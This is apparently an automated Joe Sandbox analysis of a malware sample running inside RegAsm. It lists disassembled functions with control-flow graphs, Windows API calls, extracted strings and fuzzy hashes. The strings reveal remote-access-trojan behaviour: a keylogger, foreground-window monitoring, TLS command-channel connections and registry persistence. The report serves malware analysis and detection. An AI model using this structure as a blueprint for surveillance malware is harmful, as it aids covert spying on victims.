                                control_flow_graph 925 414d86-414dc2 926 414dc8-414ddd GetSystemDirectoryA 925->926 927 414edd-414ee8 925->927 928 414ed3 926->928 929 414de3-414e2f call 441a3e call 441a98 LoadLibraryA 926->929 928->927 934 414e31-414e3b GetProcAddress 929->934 935 414e46-414e80 call 441a3e call 441a98 LoadLibraryA 929->935 936 414e42-414e44 934->936 937 414e3d-414e40 FreeLibrary 934->937 948 414e82-414e8c GetProcAddress 935->948 949 414ecf-414ed2 935->949 936->935 939 414e97 936->939 937->936 942 414e99-414eaa GetProcAddress 939->942 943 414eb4-414eb7 FreeLibrary 942->943 944 414eac-414eb0 942->944 947 414eb9-414ebb 943->947 944->942 946 414eb2 944->946 946->947 947->949 950 414ebd-414ecd 947->950 951 414e93-414e95 948->951 952 414e8e-414e91 FreeLibrary 948->952 949->928 950->949 950->950 951->939 951->949 952->951
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                • API String ID: 2490988753-744132762
                                • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • Sleep.KERNEL32(00001388), ref: 0040A740
                                  • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                  • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                  • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                  • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040A81E
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                • API String ID: 3795512280-1152054767
                                • Opcode ID: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                • Opcode Fuzzy Hash: 677456a4732d5fb77e9c8745959e99ef54ead223a942f07a0b0fb3c37e482db7
                                • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1051 4048c8-4048e8 connect 1052 404a1b-404a1f 1051->1052 1053 4048ee-4048f1 1051->1053 1056 404a21-404a2f WSAGetLastError 1052->1056 1057 404a97 1052->1057 1054 404a17-404a19 1053->1054 1055 4048f7-4048fa 1053->1055 1058 404a99-404a9e 1054->1058 1059 404926-404930 call 420c60 1055->1059 1060 4048fc-404923 call 40531e call 402093 call 41b4ef 1055->1060 1056->1057 1061 404a31-404a34 1056->1061 1057->1058 1070 404941-40494e call 420e8f 1059->1070 1071 404932-40493c 1059->1071 1060->1059 1063 404a71-404a76 1061->1063 1064 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1061->1064 1067 404a7b-404a94 call 402093 * 2 call 41b4ef 1063->1067 1064->1057 1067->1057 1083 404950-404973 call 402093 * 2 call 41b4ef 1070->1083 1084 404987-404992 call 421a40 1070->1084 1071->1067 1113 404976-404982 call 420ca0 1083->1113 1096 4049c4-4049d1 call 420e06 1084->1096 1097 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1084->1097 1110 4049d3-4049f6 call 402093 * 2 call 41b4ef 1096->1110 1111 4049f9-404a14 CreateEventW * 2 1096->1111 1097->1113 1110->1111 1111->1054 1113->1057
                                APIs
                                • connect.WS2_32(?,?,?), ref: 004048E0
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                • WSAGetLastError.WS2_32 ref: 00404A21
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                • String ID: (I)$Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                • API String ID: 994465650-157756960
                                • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
                                • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 0040AD38
                                • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                • GetForegroundWindow.USER32 ref: 0040AD49
                                • GetWindowTextLengthW.USER32 ref: 0040AD52
                                • GetWindowTextW.USER32 ref: 0040AD86
                                • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                • String ID: [${ User has been idle for $ minutes }$]
                                • API String ID: 911427763-3954389425
                                • Opcode ID: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                • Opcode Fuzzy Hash: af3cf2329a29d0ead1f6790201367748a0b563353980fa9fd476e2dccae2fe78
                                • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1206 40da34-40da59 call 401f86 1209 40db83-40dba9 call 401f04 GetLongPathNameW call 40417e 1206->1209 1210 40da5f 1206->1210 1231 40dbae-40dc1b call 40417e call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1209->1231 1212 40da70-40da7e call 41b5b4 call 401f13 1210->1212 1213 40da91-40da96 1210->1213 1214 40db51-40db56 1210->1214 1215 40daa5-40daac call 41bfb7 1210->1215 1216 40da66-40da6b 1210->1216 1217 40db58-40db5d 1210->1217 1218 40da9b-40daa0 1210->1218 1219 40db6e 1210->1219 1220 40db5f-40db64 call 43c0cf 1210->1220 1240 40da83 1212->1240 1222 40db73-40db78 call 43c0cf 1213->1222 1214->1222 1232 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1215->1232 1233 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1215->1233 1216->1222 1217->1222 1218->1222 1219->1222 1228 40db69-40db6c 1220->1228 1234 40db79-40db7e call 409057 1222->1234 1228->1219 1228->1234 1232->1240 1245 40da87-40da8c call 401f09 1233->1245 1234->1209 1240->1245 1245->1209
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                • Opcode Fuzzy Hash: f699c62159184187b538f79cdc1dbfdb69b721564b31670cb9aa7a5423fa7b62
                                • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1305 44ac49-44ac62 1306 44ac64-44ac74 call 446766 1305->1306 1307 44ac78-44ac7d 1305->1307 1306->1307 1314 44ac76 1306->1314 1309 44ac7f-44ac87 1307->1309 1310 44ac8a-44acae MultiByteToWideChar 1307->1310 1309->1310 1312 44acb4-44acc0 1310->1312 1313 44ae41-44ae54 call 434fcb 1310->1313 1315 44ad14 1312->1315 1316 44acc2-44acd3 1312->1316 1314->1307 1318 44ad16-44ad18 1315->1318 1319 44acd5-44ace4 call 457190 1316->1319 1320 44acf2-44ad03 call 446137 1316->1320 1323 44ae36 1318->1323 1324 44ad1e-44ad31 MultiByteToWideChar 1318->1324 1319->1323 1333 44acea-44acf0 1319->1333 1320->1323 1330 44ad09 1320->1330 1328 44ae38-44ae3f call 435e40 1323->1328 1324->1323 1327 44ad37-44ad49 call 448bb3 1324->1327 1335 44ad4e-44ad52 1327->1335 1328->1313 1334 44ad0f-44ad12 1330->1334 1333->1334 1334->1318 1335->1323 1337 44ad58-44ad5f 1335->1337 1338 44ad61-44ad66 1337->1338 1339 44ad99-44ada5 1337->1339 1338->1328 1342 44ad6c-44ad6e 1338->1342 1340 44ada7-44adb8 1339->1340 1341 44adf1 1339->1341 1343 44add3-44ade4 call 446137 1340->1343 1344 44adba-44adc9 call 457190 1340->1344 1345 44adf3-44adf5 1341->1345 1342->1323 1346 44ad74-44ad8e call 448bb3 1342->1346 1350 44ae2f-44ae35 call 435e40 1343->1350 1361 44ade6 1343->1361 1344->1350 1359 44adcb-44add1 1344->1359 1349 44adf7-44ae10 call 448bb3 1345->1349 1345->1350 1346->1328 1358 44ad94 1346->1358 1349->1350 1362 44ae12-44ae19 1349->1362 1350->1323 1358->1323 1363 44adec-44adef 1359->1363 1361->1363 1364 44ae55-44ae5b 1362->1364 1365 44ae1b-44ae1c 1362->1365 1363->1345 1366 44ae1d-44ae2d WideCharToMultiByte 1364->1366 1365->1366 1366->1350 1367 44ae5d-44ae64 call 435e40 1366->1367 1367->1328
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                • __freea.LIBCMT ref: 0044AE30
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • __freea.LIBCMT ref: 0044AE39
                                • __freea.LIBCMT ref: 0044AE5E
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 3864826663-0
                                • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                Function 0041C3F1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1388 41c3f1-41c402 1389 41c404-41c407 1388->1389 1390 41c41a-41c421 1388->1390 1391 41c410-41c418 1389->1391 1392 41c409-41c40e 1389->1392 1393 41c422-41c43b CreateFileW 1390->1393 1391->1393 1392->1393 1394 41c441-41c446 1393->1394 1395 41c43d-41c43f 1393->1395 1397 41c461-41c472 WriteFile 1394->1397 1398 41c448-41c456 SetFilePointer 1394->1398 1396 41c47f-41c484 1395->1396 1400 41c474 1397->1400 1401 41c476-41c47d CloseHandle 1397->1401 1398->1397 1399 41c458-41c45f CloseHandle 1398->1399 1399->1395 1400->1401 1401->1396
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID: hpF
                                • API String ID: 1852769593-151379673
                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1402 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1413 41b35d-41b366 1402->1413 1414 41b31c-41b347 call 4135a6 call 401fab StrToIntA 1402->1414 1416 41b368-41b36d 1413->1416 1417 41b36f 1413->1417 1424 41b355-41b358 call 401fd8 1414->1424 1425 41b349-41b352 call 41cf69 1414->1425 1418 41b374-41b37f call 40537d 1416->1418 1417->1418 1424->1413 1425->1424
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCurrentOpenProcessQueryValue
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 1866151309-2070987746
                                • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1476 40a675-40a685 1477 40a722-40a725 1476->1477 1478 40a68b-40a68d 1476->1478 1479 40a690-40a6b6 call 401f04 CreateFileW 1478->1479 1482 40a6f6 1479->1482 1483 40a6b8-40a6c6 GetFileSize 1479->1483 1486 40a6f9-40a6fd 1482->1486 1484 40a6c8 1483->1484 1485 40a6ed-40a6f4 CloseHandle 1483->1485 1487 40a6d2-40a6d9 1484->1487 1488 40a6ca-40a6d0 1484->1488 1485->1486 1486->1479 1489 40a6ff-40a702 1486->1489 1490 40a6e2-40a6e7 Sleep 1487->1490 1491 40a6db-40a6dd call 40b0dc 1487->1491 1488->1485 1488->1487 1489->1477 1492 40a704-40a70b 1489->1492 1490->1485 1491->1490 1492->1477 1493 40a70d-40a71d call 40905c call 40a179 1492->1493 1493->1477
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: XQG
                                • API String ID: 1958988193-3606453820
                                • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountEventTick
                                • String ID: !D@$NG
                                • API String ID: 180926312-2721294649
                                • Opcode ID: dd46a5856b9f4a2a66a2a9ff3bdaeba80821d296031fdaf545dfc14b5640e819
                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                • Opcode Fuzzy Hash: dd46a5856b9f4a2a66a2a9ff3bdaeba80821d296031fdaf545dfc14b5640e819
                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$EventLocalThreadTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 2532271599-1507639952
                                • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                • RegCloseKey.KERNEL32(?), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: pth_unenc
                                • API String ID: 1818849710-4028850238
                                • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                • CloseHandle.KERNEL32(?), ref: 00404DDB
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                • String ID:
                                • API String ID: 3360349984-0
                                • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                Function 0040482D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40networkCOMMON
